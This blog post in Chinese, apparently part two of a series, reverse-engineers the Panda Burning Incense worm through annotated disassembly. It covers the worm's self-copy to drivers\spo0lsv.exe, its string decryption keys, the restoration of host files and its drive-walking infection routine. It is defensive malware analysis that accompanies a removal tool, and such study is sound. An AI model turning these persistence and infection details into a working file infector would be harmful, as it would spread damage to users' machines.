长文预警-超详细的熊猫烧香病毒分析_01

  • 书接上文,接下来就是使用IAT、OD进行病毒汇编代码的详细分析:
  • 上文链接:长文预警-超详细的熊猫烧香病毒分析_00
  • 附带自己写的专杀工具,仅供参考(附赠专杀工具源码,由于时间仓促所以工具并不是很完善,有问题欢迎指正)。
  • 资源

2.IAT-OD双剑合璧

  • 为了更好的分析,可以先使用IAT的签名工具来更好的识别库代码

    • 在IDA中Shift+F5打开签名窗口,ins快捷键打开签名库,Ctrl+F找到Delphi的特征库,然后加载。
      长文预警-超详细的熊猫烧香病毒分析_01_第1张图片
  • 我们使用IDA和OD联合分析的手段对病毒样本进行分析:

  • 从OEP开始单步分析:

seg000:0040D278                 push    ebp             ; oep
seg000:0040D279                 mov     ebp, esp
seg000:0040D27B                 add     esp, 0FFFFFFE8h
seg000:0040D27E                 push    ebx
seg000:0040D27F                 push    esi
seg000:0040D280                 xor     eax, eax
seg000:0040D282                 mov     [ebp+var_18], eax ; 初始化局部空间为0
seg000:0040D285                 mov     [ebp+var_14], eax ; 初始化局部空间为0
seg000:0040D288                 mov     eax, offset dword_40D1C8 ; 内部调用了GetModuleHandle函数
seg000:0040D28D                 call    @Sysinit@@InitExe$qqrpv ; Sysinit::__linkproc__ InitExe(void *)
seg000:0040D292                 mov     ebx, offset dword_40F7E8 ; 两块空间首地址
seg000:0040D297                 mov     esi, offset Msg
seg000:0040D29C                 xor     eax, eax        ; 清零
seg000:0040D29E                 push    ebp             ; 三个入栈操作,不知道具体使用场景????
seg000:0040D29E                                         ; ebp是栈地址0012FF88
seg000:0040D29F                 push    offset loc_40D669
seg000:0040D2A4                 push    dword ptr fs:[eax] ; eax=0,这里是fs段首地址
seg000:0040D2A7                 mov     fs:[eax], esp
seg000:0040D2AA                 mov     eax, dword_40D678
seg000:0040D2B0                 mov     [ebx], eax
seg000:0040D2B2                 mov     eax, dword_40D67C
seg000:0040D2B8                 mov     [ebx+4], eax
seg000:0040D2BB                 mov     ax, word_40D680
seg000:0040D2C2                 mov     [ebx+8], ax
seg000:0040D2C6                 mov     al, byte_40D682
seg000:0040D2CC                 mov     [ebx+0Ah], al
seg000:0040D2CF                 mov     eax, offset dword_40F7DC ; Delphi程序默认是fastcall,前两个参数有eax,edx传递
seg000:0040D2CF                                         ; 保存字符串首地址指针
seg000:0040D2D4                 mov     edx, offset dword_40D68C ; 存储信息字符串首地址
seg000:0040D2D9                 call    StringCopy      ; 函数用于字符串拷贝,之后都是一些字符串拷贝操作
  • 之后执行到地址0040D5A6
seg000:0040D5A6                 mov     eax, offset dword_40F7E4 ; 地址存储字符串指针
seg000:0040D5AB                 mov     edx, offset dword_40D820 ;
seg000:0040D5AB                                         ; "艾玛!26"
seg000:0040D5B0                 call    StringCopy
seg000:0040D5B5                 mov     eax, offset dword_40F7D4
seg000:0040D5BA                 mov     edx, offset dword_40D830 ;
seg000:0040D5BA                                         ; "***武*汉*男*生*感*染*下*载*者***"
seg000:0040D5BF                 call    StringCopy
seg000:0040D5C4                 mov     eax, offset dword_40F7D8
seg000:0040D5C9                 mov     edx, offset dword_40D85C ;
seg000:0040D5C9                                         ; "感谢艾玛,mopery,海色の月,对此木马的关注?"
seg000:0040D5CE                 call    StringCopy
seg000:0040D5D3                 lea     ecx, [ebp+var_14] ; 堆栈地址
seg000:0040D5D6                 mov     edx, offset aXboy_0 ; "xboy"
seg000:0040D5DB                 mov     eax, offset dword_40D8A0 ;
seg000:0040D5DB                                         ; "++戊+缓"叛*聋+肛+删"蚊*苜+兆++*"
seg000:0040D5E0                 call    sub_405250      ; 这是一个解密字符串的函数,会将返回值存入[ebp-0x18]中
seg000:0040D5E0                                         ; 将dword_40D8A0解密为"***武*汉*男*生*感*染*下*载*者***"
seg000:0040D5E5                 mov     edx, [ebp+var_14] ; 解密后的字符串首地址存入edx中
seg000:0040D5E8                 mov     eax, dword_40F7D4 ; 前面字符串拷贝后的字符串首地址
seg000:0040D5E8                                         ; 存储的内容是"***武*汉*男*生*感*染*下*载*者***"
seg000:0040D5ED                 call    StringCmp       ; 用于字符串比较的函数
seg000:0040D5F2                 jz      short loc_40D5FD ; 关键跳转
seg000:0040D5F4                 push    0               ; uExitCode
seg000:0040D5F6                 call    j_ExitProcess_0 ; 跳转失败,结束进程
seg000:0040D5F6                                         ; 上面的操作验证了一些作者信息和感谢信息,验证成功后会进入病毒部分
  • 上面的操作验证了一些作者信息和感谢信息,验证成功后会进入病毒部分,也就是loc_40D5FD所在部分
seg000:0040D5FD ; ---------------------------------------------------------------------------
seg000:0040D5FD
seg000:0040D5FD loc_40D5FD:                             ; CODE XREF: start+37Aj
seg000:0040D5FD                 lea     ecx, [ebp+var_18] ; 跳转成功,进入病毒实际操作部分
seg000:0040D600                 mov     edx, offset aWhboy_0 ; 用于解密的密钥
seg000:0040D605                 mov     eax, offset dword_40D8DC ; 地址中存储的不是有意义的字符串,应该是加密过的
seg000:0040D60A                 call    sub_405250      ; 解密字符串函数,会将返回值存入[ebp-0x18]中
seg000:0040D60F                 mov     edx, [ebp+var_18] ; 解密出正确的字符串为
seg000:0040D60F                                         ; "`uup2..uxe`tm/vhjnx.fdu/nsm&uyt"
seg000:0040D612                 mov     eax, offset dword_40D908
seg000:0040D617                 call    StringCmp       ; 比较
seg000:0040D61C                 jz      short loc_40D627 ; 关键跳转
seg000:0040D61E                 push    0               ; uExitCode
seg000:0040D620                 call    j_ExitProcess_0 ; 未成功跳转结束进程
seg000:0040D620                                         ; 上述标号为loc_40D5FD的一段代码似乎是在次判断病毒是否能启动
seg000:0040D625 ; ---------------------------------------------------------------------------
  • 上述再次验证成功后,就到了代码的真正操作部分,这里有三个call对应着三种操作的函数

第一个call-保存副本并运行

seg000:0040D627 ; ---------------------------------------------------------------------------
seg000:0040D627
seg000:0040D627 loc_40D627:   ; CODE XREF: start+3A4j
seg000:0040D627   call    CreateAndRunPanda ; 重命名为CreateAndRunPanda 创建并运行病毒副本
seg000:0040D62C   call    InfectOtherFile	;重命名为InfectOtherFile	感染操作
seg000:0040D631   call    ProtectSelf		;重命名为ProtectSelf		保护自身
seg000:0040D636   jmp     short loc_40D63E
seg000:0040D638 ; ---------------------------------------------------------------------------
  • 首先是第一个函数,重命名为CreateAndRunPanda,它创建了病毒样本副本并运行这个副本。
seg000:0040819C  push    ebp   ; 开辟栈帧,开辟局部变量区域,大小为0x84*2
seg000:0040819D  mov     ebp, esp
seg000:0040819F  mov     ecx, 84h
seg000:004081A4
seg000:004081A4 loc_4081A4:    ; CODE XREF: CreateAndRunPanda+Dj
seg000:004081A4  push    0
seg000:004081A6  push    0
seg000:004081A8  dec     ecx
seg000:004081A9  jnz     short loc_4081A4 ; 循环初始化局部变量空间为0
seg000:004081AB  push    ecx             ; 保存寄存器环境
seg000:004081AC  push    ebx             ; apt
seg000:004081AD  push    esi             ; hdc
seg000:004081AE  push    edi             ; cpt
seg000:004081AF  xor     eax, eax        ; 清零eax
seg000:004081B1  push    ebp             ; aj
seg000:004081B2  push    offset loc_408781 ; apt
seg000:004081B7  push    dword ptr fs:[eax] ; hdc
seg000:004081BA  mov     fs:[eax], esp
seg000:004081BD  lea     edx, [ebp+var_3B8] ; ebp-0x3B8应该是传出参数
seg000:004081C3  xor     eax, eax
seg000:004081C5  call    GetPathName     ; 函数返回了一个地址"C:\Users\15pb-win7\Desktop\xmDump_.exe"
seg000:004081C5                          ; 判断是获取了当前程序所在路径
seg000:004081CA  mov     eax, [ebp+var_3B8] ; 得到的当前程序路径
seg000:004081D0  lea     edx, [ebp+var_3B4] ; ebp+0x3B4传出参数
seg000:004081D6  call    GetPath         ; 函数用来从获取到的路径获取到无名称的路径
seg000:004081D6                          ; "C:\Users\15pb-win7\Desktop\"
seg000:004081D6                          ; 也就是得到目录路径
seg000:004081DB  lea     eax, [ebp+var_3B4] ; 得到的当前程序所在目录路径
seg000:004081E1  mov     edx, offset aDesktop__ini ; 文件名"Desktop_.ini"
seg000:004081E6  call    StringCat       ; 字符串拼接
seg000:004081EB  mov     eax, [ebp+var_3B4] ; 拼接后的字符串首地址
seg000:004081F1  call    @Sysutils@FileExists$qqrx17System@AnsiString ; 检查路径下的文件"Desktop_.ini"是否存在
seg000:004081F6  test    al, al          ; 通过返回值al来判断是否存在
seg000:004081F6                          ; al为0不存在
seg000:004081F8  jz      loc_408288      ; 不存在文件跳转
seg000:004081FE  push    80h             ; 要设置的文件的属性
seg000:004081FE                          ; FILE_ATTRIBUTe_NORMAL
seg000:004081FE                          ; 这里提前入栈了
seg000:00408203  lea     edx, [ebp+var_3C0] ; 保存路径字符串首地址
seg000:00408209  xor     eax, eax
seg000:0040820B  call    GetPathName     ; 获取路径
seg000:00408210  mov     eax, [ebp+var_3C0]
seg000:00408216  lea     edx, [ebp+var_3BC] ; 保存文件名目录路径首地址
seg000:0040821C  call    GetPath         ; 得到目录路径
seg000:00408221  lea     eax, [ebp+var_3BC] ; 保存拼接后路径
seg000:00408227  mov     edx, offset aDesktop__ini ; "Desktop_.ini"
seg000:0040822C  call    StringCat       ; 拼接字符串
seg000:00408231  mov     eax, [ebp+var_3BC] ; 传入拼接后的字符串
seg000:00408237  call    CheckPath       ; 检查路径
seg000:0040823C  push    eax             ; lpFileName
seg000:0040823D  call    j_SetFileAttributesA ; 设置文件属性
seg000:00408242  push    1               ; dwMilliseconds
seg000:00408244  call    j_Sleep         ; 设置等待时间
seg000:00408249  lea     edx, [ebp+var_3C8]
seg000:0040824F  xor     eax, eax
seg000:00408251  call    GetPathName     ; 继续获取文件路径
seg000:00408256  mov     eax, [ebp+var_3C8]
seg000:0040825C  lea     edx, [ebp+var_3C4]
seg000:00408262  call    GetPath         ; 获取目录路径
seg000:00408267  lea     eax, [ebp+var_3C4]
seg000:0040826D  mov     edx, offset aDesktop__ini ; "Desktop_.ini"
seg000:00408272  call    StringCat       ; 拼接字符串
seg000:00408277  mov     eax, [ebp+var_3C4]
seg000:0040827D  call    CheckPath       ; 检查路径
seg000:00408282  push    eax             ; lpFileName
seg000:00408283  call    j_DeleteFileA   ; 删除文件
seg000:00408283                          ; 上述代码用于获取当前路径,同时将"Desktop_.ini"拼接到路径中
seg000:00408283                          ; 并检查是否存在,存在的话会对文件进行删除
  • 之后执行loc_408288处的代码
seg000:00408288 loc_408288:    ; CODE XREF: CreateAndRunPanda+5Cj
seg000:00408288   lea     edx, [ebp+var_3CC] ; Desktop_.ini不存在跳转到此
seg000:00408288                           ; ebp-0x3CC存储下一个路径
seg000:0040828E   xor     eax, eax
seg000:00408290   call    GetPathName     ; 寻找下一个路径
seg000:00408295   mov     eax, [ebp+var_3CC]
seg000:0040829B   lea     edx, [ebp+var_4] ; 通过路径将当前程序读取到内存中
seg000:0040829B                           ; 使用ebp-0x4保存其首地址
seg000:0040829E   call    ReadFilToMem    ; 读取文件到内存
seg000:004082A3   lea     eax, [ebp+var_8]
seg000:004082A6   call    SetAFlag        ; 在内存之前设置一个标记
seg000:004082AB   mov     eax, [ebp+var_4] ; 内存首地址
seg000:004082AE   call    GetFileLen      ; 获取到文件的大小
seg000:004082AE                           ; 大小存储在内存首地址-0x4的位置
seg000:004082AE                           ; Delphi程序字符串首地址减去0x4的位置存储的就是字符串的长度
seg000:004082B3   mov     ebx, eax        ; ebx存储长度
seg000:004082B5   jmp     short loc_4082DB
  • 读取文件到内存成功后,跳转到 loc_4082DB继续执行代码
seg000:004082DB loc_4082DB:              ; CODE XREF: CreateAndRunPanda+119j
seg000:004082DB  test    ebx, ebx        ; 判断内存大小
seg000:004082DD  jle     short loc_4082E9
seg000:004082DF  mov     eax, [ebp+var_4]
seg000:004082E2  cmp     byte ptr [eax+ebx-1], 0
seg000:004082E7  jnz     short loc_4082B7 ;
seg000:004082E7                           ; 上述代码操作就是将病毒文件信息读取到内存中,
seg000:004082E9 loc_4082E9:    ; CODE XREF: CreateAndRunPanda+141j
seg000:004082E9  cmp     [ebp+var_8], 0  ; 判断这个标记,前面设置过
seg000:004082ED  jnz     loc_40845E      ; 不等于0跳转
seg000:004082F3  lea     edx, [ebp+var_3D8] ; 存放路径的数组的首地址指针
seg000:004082F9  xor     eax, eax
seg000:004082FB  call    GetPathName     ; 得到文件路径,带文件名
seg000:00408300  mov     eax, [ebp+var_3D8]
seg000:00408306  lea     edx, [ebp+var_3D4] ; 存储大写路径字符串的首地址指针
seg000:0040830C  call    StringToUpper   ; 转换为大写
seg000:00408311  mov     eax, [ebp+var_3D4] ; 大写路径首地址
seg000:00408317  push    eax
seg000:00408318  lea     eax, [ebp+var_3E4] ; 用于存储系统路径
seg000:0040831E  call    GetSystemPath   ; 得到系统路径
seg000:00408323  push    [ebp+var_3E4]
seg000:00408329  push    offset aDrivers ; "drivers\\"
seg000:0040832E  push    offset aSpo0lsv_exe ; "spo0lsv.exe"
seg000:00408333  lea     eax, [ebp+var_3E0] ; 多个字符串拼接,拼接后的字符串首地址存储在ebp-0x3E0
seg000:00408339  mov     edx, 3          ; 指明了参数个数
seg000:0040833E  call    StringCatN      ; 拼接多个字符串为一个
seg000:00408343  mov     eax, [ebp+var_3E0]
seg000:00408349  lea     edx, [ebp+var_3DC] ; 存储大写路径首地址指针
seg000:0040834F  call    StringToUpper   ; 转化为大写
seg000:00408354  mov     edx, [ebp+var_3DC] ; 大写路径首地址"C:\WINDOWS\SYSTEM32\DRIVERS\SPO0LSV.EXE"
seg000:0040835A  pop     eax             ;  当前程序的路径首地址
seg000:0040835B  call    StringCmp       ; 比较
seg000:00408360  jz      loc_40845E      ; 相同跳转
seg000:00408366  mov     eax, offset aSpo0lsv_exe ; "spo0lsv.exe"
seg000:0040836B  call    FindAndTerminateProcess ; 关闭进程
seg000:00408370  mov     eax, offset aSpo0lsv_exe ; "spo0lsv.exe"
seg000:00408375  call    FindAndTerminateProcess
seg000:0040837A  push    80h             ; dwFileAttributes
seg000:0040837A                          ; FILE_ATTRIBUTE_NORMAL
seg000:0040837F  lea     eax, [ebp+var_3EC] ; 再次获取系统路径
seg000:00408385  call    GetSystemPath
seg000:0040838A  push    [ebp+var_3EC]
seg000:00408390  push    offset aDrivers ; "drivers\\"
seg000:00408395  push    offset aSpo0lsv_exe ; "spo0lsv.exe"
seg000:0040839A  lea     eax, [ebp+var_3E8] ; 再次进行路径拼接
seg000:004083A0  mov     edx, 3
seg000:004083A5  call    StringCatN
seg000:004083AA  mov     eax, [ebp+var_3E8]
seg000:004083B0  call    CheckPath       ; 检查路径
seg000:004083B5  push    eax             ; lpFileName
seg000:004083B6  call    j_SetFileAttributesA ; 修改文件属性
seg000:004083BB  push    1               ; dwMilliseconds
seg000:004083BD  call    j_Sleep         ; 设置睡眠时间
seg000:004083C2  push    0               ; apt
seg000:004083C4  lea     eax, [ebp+var_3F4]
seg000:004083CA  call    GetSystemPath   ; 获取系统路径
seg000:004083CF  push    [ebp+var_3F4]
seg000:004083D5  push    offset aDrivers ; "drivers\\"
seg000:004083DA  push    offset aSpo0lsv_exe ; "spo0lsv.exe"
seg000:004083DF  lea     eax, [ebp+var_3F0]
seg000:004083E5  mov     edx, 3
seg000:004083EA  call    StringCatN      ; 拼接
seg000:004083EF  mov     eax, [ebp+var_3F0]
seg000:004083F5  call    CheckPath       ; 检查路径
seg000:004083FA  push    eax             ; 文件"spo0lsv.exe"路径如入栈保存
seg000:004083FB  lea     edx, [ebp+var_3F8]
seg000:00408401  xor     eax, eax
seg000:00408403  call    GetPathName     ; 得到当前进程路径
seg000:00408408  mov     eax, [ebp+var_3F8]
seg000:0040840E  call    CheckPath       ; 检查路径
seg000:00408413  push    eax             ; lpExistingFileName
seg000:00408414  call    j_CopyFileA     ; 拷贝当前程序到"C:\Windows\system32\drivers\spo0lsv.exe"
seg000:00408414                          ; 这个就是熊猫烧香的文件副本
seg000:00408414                          ; 专杀工具要关注的地方
seg000:00408419  push    1               ; uCmdShow
seg000:0040841B  lea     eax, [ebp+var_400]
seg000:00408421  call    GetSystemPath   ; 重新获取系统路径
seg000:00408426  push    [ebp+var_400]   ; 入栈系统路径首地址指针
seg000:0040842C  push    offset aDrivers ; "drivers\\"
seg000:00408431  push    offset aSpo0lsv_exe ; "spo0lsv.exe"
seg000:00408436  lea     eax, [ebp+var_3FC]
seg000:0040843C  mov     edx, 3
seg000:00408441  call    StringCatN      ; 拼接为路径"C:\Windows\system32\drivers\spo0lsv.exe"
seg000:00408446  mov     eax, [ebp+var_3FC]
seg000:0040844C  call    CheckPath       ; 检查路径
seg000:00408451  push    eax             ; lpCmdLine
seg000:00408452  call    j_WinExec       ; 运行病毒副本所在的文件
seg000:00408457  push    0               ; uExitCode
seg000:00408459  call    j_ExitProcess_0 ; 退出程序
seg000:00408459                                         ; 上述操作就是病毒所做的第一步操作
seg000:00408459                                         ; 删除系统路径下的spo0lsv文件,然后将将病毒自身伪装成
seg000:00408459                                         ; spo0lsv文件存储在系统路径下,之后打开这个文件,并结
seg000:00408459                                         ; 束掉自身
  • 上述代码当检测到系统路径下已经存在病毒文件后,会执行下述的代码,释放之前申请存放病毒文件信息的内存,并获取标记信息。我们可以修改关键跳转进入这个流程,然后继续分析。
seg000:00408741 loc_408741:  ; CODE XREF: CreateAndRunPanda+2D6j
seg000:00408741 mov     edx, [ebp+var_8] ; 申请内存空间首地址
seg000:00408744 mov     eax, offset dword_4087D8 ; 地址dword_4087D8存储的是0x1
seg000:00408749 call    unknown_libname_77 ; 对标号进行检查
seg000:0040874E test    eax, eax
seg000:00408750 jg      loc_408477      ; 如果找到标记字符,则跳转
  • 运行病毒样本,找到被感染的exe程序(也就是变为熊猫烧香图标的程序),然后使用OD调试,判断修改的方式。

  • 要分析的原文件的属性:
    长文预警-超详细的熊猫烧香病毒分析_01_第2张图片
    长文预警-超详细的熊猫烧香病毒分析_01_第3张图片

  • 中毒后大小:
    长文预警-超详细的熊猫烧香病毒分析_01_第4张图片
    可以看出中病毒后的程序的大小刚好是病毒样本的大小加上原程序的大小,所以可以猜测病毒并未对原程序做删除操作,应该是在原程序基础上添加了病毒程序。

  • 下面进行分析,使用已经被感染的程序在OD中分析,这样可以进入下面跳转的代码:
    在这里插入图片描述
    标号是如下的一段信息:
    在这里插入图片描述
    下面是在IDA中的分析,这段代码的主要功能就是提取出被病毒改写的文件的原本信息,然后在当前的文件夹再创建一个原文件(即在当前目录下释放出一个原始文件),被病毒感染过的文件保存有原文件内容。之后代码进入到loc_408584处。

seg000:00408477 ; ---------------------------------------------------------------------------
seg000:00408477
seg000:00408477 loc_408477:               ; CODE XREF: CreateAndRunPanda+5B4j
seg000:00408477 lea     eax, [ebp+var_14] ; 如果标记存在,跳转到此处
seg000:0040847A push    eax             ; 这个push用于之后的CpyStrMem运算
seg000:0040847B mov     edx, [ebp+var_8] ; 标记字符串指针
seg000:0040847E mov     eax, offset dword_4087D8 ; 0x1是标记字符串的结尾
seg000:00408483 call    FindSingPos     ; 获取标号0x1的位置
seg000:00408488 mov     ecx, eax
seg000:0040848A dec     ecx             ; 对所在位置减一,得到的就是标记字符串的大小
seg000:0040848B mov     edx, 1
seg000:00408490 mov     eax, [ebp+var_8] ; 文件在内存中的首地址
seg000:00408493 call    CpyStrMem       ; 拷贝一份无0x1结尾的标记,新的标记首地址存入ebp-0x14内存中
seg000:00408498 lea     eax, [ebp+var_14]
seg000:0040849B mov     ecx, 5
seg000:004084A0 mov     edx, 1
seg000:004084A5 call    DeleteStringBuf ; 删除标记的前五个字节,也就是WhBoy
seg000:004084AA lea     eax, [ebp+var_C]
seg000:004084AD push    eax             ; 这个push也用于之后的CpyStrMem运算
seg000:004084AE mov     edx, [ebp+var_14]
seg000:004084B1 mov     eax, offset dword_4087E4 ; 0x2
seg000:004084B6 call    FindSingPos     ; 获取去掉前五个字节后的字符串中0x2的位置
seg000:004084BB mov     ecx, eax
seg000:004084BD dec     ecx             ; 得到字符串长度
seg000:004084BE mov     edx, 1
seg000:004084C3 mov     eax, [ebp+var_14]
seg000:004084C6 call    CpyStrMem       ; 拷贝一份新的长度的字符串到ebp-0xc
seg000:004084CB mov     edx, [ebp+var_14]
seg000:004084CE mov     eax, offset dword_4087E4
seg000:004084D3 call    FindSingPos     ; 又进行了上一个字符串操作
seg000:004084D8 mov     ecx, eax
seg000:004084DA lea     eax, [ebp+var_14]
seg000:004084DD mov     edx, 1
seg000:004084E2 call    DeleteStringBuf ; 清除0x2标记即其之前的字符串,只留下了一串数字
seg000:004084E2                         ; 这串数字就是原先文件的大小
seg000:004084E7 mov     eax, [ebp+var_14] ; 清除后的字符串
seg000:004084EA call    StrToInt        ; 转换为int型
seg000:004084EF mov     [ebp+var_18], eax ; 大小存入ebp-0x18
seg000:004084F2 xor     eax, eax
seg000:004084F4 push    ebp             ; uStyle
seg000:004084F5 push    offset loc_40857A ; lpReOpenBuff
seg000:004084FA push    dword ptr fs:[eax] ; lpFileName
seg000:004084FD mov     fs:[eax], esp
seg000:00408500 mov     edx, [ebp+var_C] ; 去掉前五个字节的标记字符串的首地址
seg000:00408503 lea     eax, [ebp+var_1E4]
seg000:00408509 call    CreateNewFile   ; 根据原文件的名称创建出新文件
seg000:0040850E mov     eax, off_40E2BC
seg000:00408513 mov     byte ptr [eax], 2
seg000:00408516 lea     eax, [ebp+var_1E4] ; 文件指针
seg000:0040851C call    OpenFile        ; 打开文件,以文本的方式
seg000:00408521 call    _IOTest
seg000:00408526 lea     eax, [ebp+var_404]
seg000:0040852C push    eax
seg000:0040852D mov     eax, [ebp+var_4] ; 当前文件信息的首地址
seg000:00408530 call    GetFileLen      ; 获取当前文件信息的大小
seg000:00408535 mov     edx, eax
seg000:00408537 sub     edx, [ebp+var_18] ; 减去原文件大小得到病毒文件大小
seg000:0040853A mov     ecx, [ebp+var_18] ; 原文件大小
seg000:0040853D mov     eax, [ebp+var_4] ; 当前文件信息首地址
seg000:00408540 call    CpyStrMem       ; 拷贝一份获取原文件信息
seg000:00408545 mov     edx, [ebp+var_404] ; 拷贝的原文件信息首地址指针存放在ebp-0x404
seg000:0040854B lea     eax, [ebp+var_1E4] ; 新建的文件指针
seg000:0040854B                         ; 之后的操作应该是向新建的文件中写入原文件内容
seg000:00408551 call    WriteFileInfo
seg000:00408556 call    Flush           ; 提交缓冲区
seg000:0040855B call    _IOTest
seg000:00408560 lea     eax, [ebp+var_1E4]
seg000:00408566 call    CloseFile       ; 关闭文件
seg000:0040856B call    _IOTest
seg000:00408570 xor     eax, eax
seg000:00408572 pop     edx
seg000:00408573 pop     ecx
seg000:00408574 pop     ecx
seg000:00408575 mov     fs:[eax], edx
seg000:00408578 jmp     short loc_408584
seg000:0040857A ; ---------------------------------------------------------------------------
seg000:00408584 loc_408584:             ; CODE XREF: CreateAndRunPanda+3DCj
seg000:00408584 call    sub_407B68      ; 批处理文件函数
seg000:00408589 mov     eax, offset aSpo0lsv_exe ; "spo0lsv.exe"
seg000:0040858E call    sub_405458      ; 检查进程中是否存在spo0lsv.exe
seg000:00408593 test    al, al
seg000:00408595 jnz     loc_40873A      ; 存在就跳转
seg000:00408595                         ; 若不存在就从病毒文件中重新提取病毒样本
seg000:00408595                         ; 然后执行类似上述标号为loc_4082E9的代码
seg000:00408595                         ; 重新在系统路径中生成spo0lsv.exe文件
seg000:0040859B push    80h             ; dwFileAttributes
  • 总结下来,被感染文件主要就是用来维护病毒文件,如果系统目录下的病毒文件被删除了,被感染文件会重新创建一份在系统目录下。

    第二个call-感染过程

  • 前面说的三个call中的第二个call就是病毒对与文件的感染过程。通过分析这个函数,就可以知道病毒的感染流程,然后针对性的进行修复。

  • 将第二个call重命名为InfectOtherFile,这是熊猫烧香的核心部分。函数内部使用了如下三种方式进行病毒的感染:

seg000:0040D18C InfectOtherFile proc near  ; CODE XREF: start+3B4p
seg000:0040D18C call    CreateInfectThread ; 创建感染线程
seg000:0040D191 call    SetTimerAuto    ; 通过时钟写Autorun.inf文件
seg000:0040D196 mov     ax, 0Ah
seg000:0040D19A call    NetWorkInfect   ; 通过网络进行感染
seg000:0040D19F retn
seg000:0040D19F InfectOtherFile endp
1.线程回调分析
  • 首先进行现场感染分析,进入函数找到线程的回调函数所在地址sub_40A48C。
seg000:0040A5B0 CreateInfectThread proc near ; CODE XREF: InfectOtherFilep
seg000:0040A5B0 push    ecx
seg000:0040A5B1 push    esp             ; lpThreadId
seg000:0040A5B2 push    0               ; dwCreationFlags
seg000:0040A5B4 push    0               ; lpParameter
seg000:0040A5B6 push    offset sub_40A48C ; lpStartAddress
seg000:0040A5BB push    0               ; dwStackSize
seg000:0040A5BD push    0               ; lpThreadAttributes
seg000:0040A5BF call    j_CreateThread_0
seg000:0040A5C4 pop     edx
seg000:0040A5C5 retn
seg000:0040A5C5 CreateInfectThread endp
  • 分析线程回调函数:
;省略部分开辟栈帧代码
seg000:0040A49B xor     eax, eax
seg000:0040A49D push    ebp
seg000:0040A49E push    offset loc_40A57F
seg000:0040A4A3 push    dword ptr fs:[eax] ; fs段首地址
seg000:0040A4A6 mov     fs:[eax], esp   ; fs段首地址赋值为esp
seg000:0040A4A9 lea     eax, [ebp+var_4] ; 存放驱动器名称
seg000:0040A4AC call    GetDriverNameStr      ; 函数用来获取驱动器名称,生成一个名称字符串
seg000:0040A4B1 mov     eax, [ebp+var_4]
seg000:0040A4B4 call    GetFileLen      ; 得到驱动器的个数
seg000:0040A4B9 mov     esi, eax
seg000:0040A4BB
seg000:0040A4BB loc_40A4BB:              ; CODE XREF: sub_40A48C+34j
seg000:0040A4BB                          ; sub_40A48C+D3j
seg000:0040A4BB mov     ebx, esi
seg000:0040A4BD cmp     ebx, 1
seg000:0040A4C0 jl      short loc_40A4BB ; 判断驱动器个数是否小于1,小于跳转
  • 不进行跳转就顺序执行到了标号为loc_40A4C2的地址处的代码:
seg000:0040A4C2 loc_40A4C2:   			; CODE XREF: sub_40A48C+CDj
seg000:0040A4C2 lea     eax, [ebp+var_C]
seg000:0040A4C5 mov     edx, [ebp+var_4]
seg000:0040A4C8 mov     dl, [edx+ebx-1] ; 使用一个值修改edx中的地址
seg000:0040A4CC call    StrToChr        ; 将字符串转换为字符
seg000:0040A4D1 mov     eax, [ebp+var_C] ; 转换后的字符的指针
seg000:0040A4D4 lea     edx, [ebp+var_8] ; 存储大写的驱动器字符名称
seg000:0040A4D7 call    StringToUpper   ; 转换为大写
seg000:0040A4DC mov     eax, [ebp+var_8]
seg000:0040A4DF push    eax             ; 入栈保存
seg000:0040A4E0 lea     edx, [ebp+var_10]
seg000:0040A4E3 mov     eax, offset dword_40A594 ; 字符"a"
seg000:0040A4E8 call    StringToUpper
seg000:0040A4ED mov     eax, [ebp+var_10] ; 大写字符"A"
seg000:0040A4F0 pop     edx             ; 大写的驱动器名称
seg000:0040A4F1 call    FindSingPos     ; 获取驱动名称中以直到A的长度
seg000:0040A4F1                         ; 在虚拟机中只有C盘,所以为0
seg000:0040A4F6 test    eax, eax
seg000:0040A4F8 jnz     short loc_40A556 ; 不为0跳转
seg000:0040A4FA lea     eax, [ebp+var_18]
seg000:0040A4FD mov     edx, [ebp+var_4]
seg000:0040A500 mov     dl, [edx+ebx-1]
seg000:0040A504 call    StrToChr        ; 又进行了一次转换
seg000:0040A504                         ; 这是为了第二次判断驱动器
seg000:0040A509 mov     eax, [ebp+var_18]
seg000:0040A50C lea     edx, [ebp+var_14]
seg000:0040A50F call    StringToUpper
seg000:0040A514 mov     eax, [ebp+var_14]
seg000:0040A517 push    eax
seg000:0040A518 lea     edx, [ebp+var_1C]
seg000:0040A51B mov     eax, offset dword_40A5A0 ; 字符"b"
seg000:0040A520 call    StringToUpper   ; 转换为"B"
seg000:0040A525 mov     eax, [ebp+var_1C]
seg000:0040A528 pop     edx
seg000:0040A529 call    FindSingPos     ; 再次判断B在驱动器名称中的位置
seg000:0040A52E test    eax, eax
seg000:0040A530 jnz     short loc_40A556
seg000:0040A532 lea     eax, [ebp+var_20]
seg000:0040A535 mov     edx, [ebp+var_4]
seg000:0040A538 mov     dl, [edx+ebx-1]
seg000:0040A53C call    StrToChr        ; BDS 2005-2007 and Delphi6-7 Visual Component Library
seg000:0040A541 lea     eax, [ebp+var_20]
seg000:0040A544 mov     edx, offset loc_40A5AC ; ASCII ":\"
seg000:0040A549 call    StringCat       ; 拼接为一个路径
seg000:0040A54E mov     eax, [ebp+var_20]
seg000:0040A551 call    FindFileAndInfect ; 通过获取到的驱动器(磁盘路径)遍历内部文件
seg000:0040A551                                         ; 然后感染他们
seg000:0040A556
seg000:0040A556 loc_40A556:                         
seg000:0040A556                                         
seg000:0040A556 dec     ebx             ; 递减驱动器个数进行循环
seg000:0040A557 test    ebx, ebx
seg000:0040A559 jnz     loc_40A4C2
seg000:0040A55F jmp     loc_40A4BB      ; while true
seg000:0040A55F sub_40A48C      endp
  • 通过上述分析,找到了一个关键的感染函数- sub.00409348,将其重命名为FindFileAndInfect,然后进入函数内部进行分析:
;省略局部空间初始化等部分代码
seg000:00409393  mov     eax, [ebp+strDriverPath] ; 驱动器路径
seg000:00409396  call    GetFileLen      ; 得到路径字符串大小
seg000:0040939B  mov     edx, [ebp+strDriverPath]
seg000:0040939E  cmp     byte ptr [edx+eax-1], 5Ch ; 判断最后一个字符是否为"\"
seg000:004093A3  jz      short loc_4093B2 ; 是的话跳转
seg000:004093A5  lea     eax, [ebp+strDriverPath] ; 不是的话拼接一个"\"
seg000:004093A8  mov     edx, offset dword_40A1B0 ; 字符"\"
seg000:004093AD  call    StringCat
seg000:004093B2
seg000:004093B2 loc_4093B2:                     
seg000:004093B2  lea     eax, [ebp+var_178] ; 存储拼接后的路径
seg000:004093B8  mov     ecx, offset dword_40A1BC ; 通配符"*.*"
seg000:004093BD  mov     edx, [ebp+strDriverPath]
seg000:004093C0  call    DriverPathCat   ; 进行拼接
